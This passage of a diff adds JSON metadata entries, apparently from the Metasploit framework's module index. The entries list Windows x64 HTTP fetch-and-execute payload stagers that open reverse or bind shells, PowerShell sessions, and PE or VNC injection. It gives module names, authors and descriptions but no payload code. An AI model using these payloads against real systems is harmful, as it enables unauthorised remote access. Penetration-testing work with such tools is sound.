+ "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/peinject/bind_tcp": { + "name": "HTTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/peinject/bind_tcp_rc4": { + "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/peinject/bind_tcp_uuid": { + "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/peinject/reverse_named_pipe": { + "name": "HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/http/x64/peinject/reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/peinject/reverse_tcp_rc4": { + "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/peinject/reverse_tcp_uuid": { + "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/pingback_reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/http/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/powershell_bind_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/windows/http/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/powershell_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/windows/http/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/powershell_reverse_tcp_ssl": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/http/x64/shell/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/shell/bind_named_pipe": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/shell/bind_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/shell/bind_tcp_rc4": { + "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/shell/bind_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/shell/reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/shell/reverse_tcp_rc4": { + "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/shell/reverse_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/shell_bind_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/http/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/shell_reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/http/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/vncinject/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/vncinject/bind_named_pipe": { + "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/vncinject/bind_tcp": { + "name": "HTTP Fetch, Windows x64 Bind TCP Stager", + "fullname": 